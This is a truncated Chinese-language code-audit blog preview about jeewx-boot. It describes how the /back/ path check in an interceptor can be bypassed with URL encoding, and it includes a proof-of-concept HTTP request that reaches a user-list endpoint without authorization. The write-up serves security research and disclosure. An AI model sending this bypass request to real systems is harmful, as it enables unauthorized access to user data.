『代码审计』jeewx-boot 代码审计

文章预览

0x00 前言 在最近的挖洞过程中，遇到了一个 jeewx-boot ，发现其在 github 上有源码，就对该项目进行了代码审计。 0x01 未授权访问漏洞 这个项目 base-system 是主要的模块， JeewxBootApplication 是启动类。 查看 interceptors 的拦截器。 这里只是对用户请求的访问地址是否存在 /back/ 进行判断，根据之前的学习，在 spring mvc 的全版本中存在 url 编码的方式进行绕过。 web 验证： 对 c 进行 url 编码后，成功未授权。 poc ： GET /jeewx/system/ba%63k/jwSystemUser/list.do HTTP/1.1 Host : 10.27.2.192 Pragma : no-cache Cache-Control : no-cache Upgrade-Insecure-Requests : 1 User-Agent : Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding : gzip, deflate Accep ………………………………